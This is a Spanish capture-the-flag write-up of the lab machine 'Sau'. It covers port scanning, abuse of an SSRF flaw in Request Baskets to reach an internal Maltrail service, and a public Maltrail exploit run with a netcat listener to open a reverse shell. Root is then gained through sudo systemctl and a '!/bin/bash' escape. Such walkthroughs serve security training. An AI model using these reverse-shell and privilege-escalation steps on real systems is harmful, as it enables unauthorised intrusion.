# Sau

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.11.224
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fz2K2BYWATgAcQdnP8CtN%2FCaptura%20de%20pantalla%202025-02-21%20190333.png?alt=media&#x26;token=f7c30f85-f313-4b12-a179-d6b3729f1044" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.11.224
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FdeIT4qx2zPaH6kP1sNjp%2FCaptura%20de%20pantalla%202025-02-21%20190507.png?alt=media&#x26;token=0e9f7c88-0594-4406-a26b-c668a0ee69b2" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **Puerto 22 (SSH)**: El servicio SSH está en ejecución con la versión 8.2p1 de OpenSSH en un sistema Ubuntu. Esta versión es relativamente moderna y es probable que esté actualizada, pero aún es importante revisar posibles vulnerabilidades específicas de esta versión, como debilidades en la configuración del servicio o ataques de fuerza bruta si no se utiliza autenticación de clave pública. El escaneo de las claves del host muestra RSA, ECDSA y ED25519, lo que sugiere que se están utilizando claves modernas, lo que es una buena práctica.
* **Puerto 80 (HTTP)**: El puerto 80 está filtrado, lo que significa que no hay respuesta directa en este puerto desde el escaneo. Podría haber un firewall o una configuración de seguridad que bloquea el tráfico en este puerto, o simplemente podría no estar activo.
* **Puerto 55555 (HTTP)**: Este puerto está abierto y ejecuta un servidor HTTP construido con Golang, como indica la descripción. El título de la página es "Request Baskets" y la solicitud fue redirigida a `/web`, lo que indica que la aplicación web probablemente tenga rutas configuradas para manejar diferentes solicitudes.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,55555 -v 10.10.11.224
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FZlkE67r8yVMCufixgKUx%2Fimage.png?alt=media&#x26;token=9fd0720c-f59f-4e58-a6f1-c218118d5e36" alt=""><figcaption></figcaption></figure>

Reviso el puerto 55555.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F26nNtVFLodyMeaQCLyl2%2Fimage.png?alt=media&#x26;token=583475e3-1ecc-4902-8fd3-40ca7df679f3" alt=""><figcaption></figcaption></figure>

Mirando la página nos sale la versión por lo que buscamos si tiene un CVE para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHlQPKCkNthGVwlnCnJbC%2Fimage.png?alt=media&#x26;token=f32284f3-f9f4-4b91-a11a-b606ef8cea09" alt=""><figcaption></figcaption></figure>

Al realizar una búsqueda en Google, se puede identificar que esta versión es vulnerable a una falla de SSRF (Server Side Request Forgery), CVE-2023-27163, que afecta al componente de la API de Request Baskets, específicamente en el endpoint `/api/baskets/{name}`. Esta vulnerabilidad permite a los atacantes realizar solicitudes manipuladas a la API, lo que les da acceso a recursos internos de la red e información sensible.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FpyvxUbuZjkXPHPQBKDJN%2Fimage.png?alt=media&#x26;token=f47aaf8d-437c-48e9-8675-29ba229dc903" alt=""><figcaption></figcaption></figure>

Enviamos la petición como se nos indica.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F879RqLbsAWWopsMQyRDf%2Fimage.png?alt=media&#x26;token=7273014f-6241-4c4a-909e-1ca663f0086f" alt=""><figcaption></figcaption></figure>

Dado que esta versión es vulnerable a SSRF y que el puerto 80 estaba filtrado, lo que nos impedía acceder a él desde el exterior, modificaremos la configuración para redirigir las solicitudes GET hacia el propio localhost del servidor, específicamente al puerto 80. De esta forma, conseguiremos establecer una conexión con los recursos internos del servidor.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FSPQ9hYSZEUAzcPDIPyjC%2Fimage.png?alt=media&#x26;token=367eba8e-5e51-439d-b3f2-49ba8cc48a2e" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Recargamos de nuevo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FB8QZfmjdEBnKIGhwRqp0%2Fimage.png?alt=media&#x26;token=a88f04ef-1d13-4a9d-b952-4a5069a1eb99" alt=""><figcaption></figcaption></figure>

Miramos si la versión de **Maltrail** tiene alguna vulnerabilidad por internet.

{% @github-files/github-code-block url="<https://github.com/spookier/Maltrail-v0.53-Exploit>" %}

Ejecutamos mientras nos ponemos en escucha.

```bash
python3 exploit.py 10.10.14.14 4444 http://10.10.11.224:55555/6ywt1xx/
nc -lvnp 4444
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fp7YqnxDRLd1hFJB7RiGJ%2Fimage.png?alt=media&#x26;token=72505653-d97b-48ca-bf03-060091607bf3" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqWAXLwiQVD7lYqy1foOv%2Fimage.png?alt=media&#x26;token=974e2a49-5a69-4792-a286-328958ce9115" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/systemctl/>" %}

```bash
sudo /usr/bin/systemctl status trail.service
!/bin/bash
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXNHoFEPqirDbMk7crpzr%2Fimage.png?alt=media&#x26;token=38b6b6e1-7cf1-4ad2-bd0a-d5abf1113c9b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FO7yfbtcnJ3N8111dLKTg%2FCaptura%20de%20pantalla%202025-02-21%20195946.png?alt=media&#x26;token=277e321b-983f-46b7-b18e-ac8c58002553" alt=""><figcaption></figcaption></figure>
